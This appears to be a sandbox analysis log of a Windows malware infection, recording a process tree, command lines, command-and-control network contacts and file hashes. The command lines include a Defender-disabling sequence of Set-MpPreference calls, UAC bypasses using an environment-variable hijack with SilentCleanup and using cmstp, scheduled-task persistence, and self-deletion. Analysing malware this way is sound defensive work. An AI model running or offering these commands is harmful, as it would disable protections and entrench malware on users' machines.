PID 2836 wrote to memory of 3784 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 3252 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3252 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3252 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3252 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3248 wrote to memory of 348 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 3248 wrote to memory of 348 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 3248 wrote to memory of 348 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 348 wrote to memory of 3680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 348 wrote to memory of 3680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 348 wrote to memory of 3680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3496 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe
PID 3496 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe
PID 3496 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe
PID 3496 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe
PID 3496 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe
PID 3496 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe
PID 3496 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe
PID 3496 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe
PID 3496 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe
PID 3496 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe
PID 3496 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe
PID 3496 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe
PID 3496 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 3496 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 3496 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 3496 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 2196 wrote to memory of 1824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2196 wrote to memory of 1824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2196 wrote to memory of 1824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 788 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 788 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 788 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 788 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 788 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 788 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 788 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 788 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 788 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 788 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Windows\SysWOW64\cmd.exe
PID 788 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Windows\SysWOW64\cmd.exe
PID 788 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Windows\SysWOW64\cmd.exe
PID 3956 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe C:\Windows\SysWOW64\mshta.exe
PID 3956 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe C:\Windows\SysWOW64\mshta.exe
PID 3956 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe C:\Windows\SysWOW64\mshta.exe
PID 3956 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe C:\Windows\SysWOW64\mshta.exe
PID 3536 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Windows\SysWOW64\schtasks.exe
PID 3536 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Windows\SysWOW64\schtasks.exe
PID 3536 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /pid 3248 & erase C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\731583472955140\\* & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /pid 3248

C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe

"C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe"

C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe

"C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe"

C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe

"C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe"

C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe

"C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe"

C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe

"C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe

"C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Trast.bat" "

C:\Windows\SysWOW64\mshta.exe

C:\Windows\System32\mshta.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Windows\SysWOW64\reg.exe

reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "

C:\Windows\SysWOW64\schtasks.exe

schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nest.bat" "

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe

"{path}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

\??\c:\windows\SysWOW64\cmstp.exe

"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\asj2ixla.inf

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\Admin\AppData\Local\Temp\tmp8907.tmp"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}

C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe

"{path}"

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Windows\temp\2hw54vq4.exe

C:\Windows\temp\2hw54vq4.exe

C:\Windows\temp\2hw54vq4.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SysWOW64\taskkill.exe

taskkill /IM cmstp.exe /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 telete.in udp
N/A 195.201.225.248:443 telete.in tcp
N/A 8.8.8.8:53 danielmi.ac.ug udp
N/A 185.215.113.77:80 danielmi.ac.ug tcp
N/A 45.67.231.40:80 45.67.231.40 tcp
N/A 8.8.8.8:53 danielmax.ac.ug udp
N/A 185.215.113.77:80 danielmax.ac.ug tcp
N/A 185.215.113.77:80 danielmax.ac.ug tcp
N/A 8.8.8.8:53 cdn.discordapp.com udp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 8.8.8.8:53 sergio.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 icacxndo.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 icando.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 icando.ug udp

Files

memory/2836-116-0x0000000000000000-mapping.dmp

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/3252-120-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/3152-126-0x0000000000640000-0x000000000078A000-memory.dmp

memory/2836-127-0x0000000000440000-0x00000000004EE000-memory.dmp

memory/3252-128-0x0000000000450000-0x00000000004FE000-memory.dmp

memory/3496-129-0x000000000044003F-mapping.dmp

memory/3784-130-0x000000000041A684-mapping.dmp

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/3248-132-0x0000000000417A8B-mapping.dmp

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/3496-135-0x0000000000400000-0x0000000000495000-memory.dmp

memory/3152-134-0x0000000003550000-0x0000000003558000-memory.dmp

memory/3496-136-0x0000000001F40000-0x0000000001F41000-memory.dmp

memory/3784-138-0x0000000000520000-0x000000000066A000-memory.dmp

memory/3248-139-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3784-137-0x0000000000400000-0x0000000000420000-memory.dmp

memory/3248-140-0x00000000004A0000-0x00000000004A1000-memory.dmp

\Users\Admin\AppData\LocalLow\sqlite3.dll

MD5 f964811b68f9f1487c2b41e1aef576ce
SHA1 b423959793f14b1416bc3b7051bed58a1034025f
SHA256 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

\ProgramData\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

\ProgramData\nss3.dll

MD5 bfac4e3c5908856ba17d41edcd455a51
SHA1 8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256 e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

\ProgramData\mozglue.dll

MD5 8f73c08a9660691143661bf7332c3c27
SHA1 37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

memory/348-145-0x0000000000000000-mapping.dmp

memory/3680-146-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll

MD5 02cc7b8ee30056d5912de54f1bdfc219
SHA1 a6923da95705fb81e368ae48f93d28522ef552fb
SHA256 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA512 0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll

MD5 eae9273f8cdcf9321c6c37c244773139
SHA1 8378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256 a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA512 06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll

MD5 4e8df049f3459fa94ab6ad387f3561ac
SHA1 06ed392bc29ad9d5fc05ee254c2625fd65925114
SHA256 25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA512 3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll

MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll

MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

memory/3208-152-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/3956-155-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

memory/736-158-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
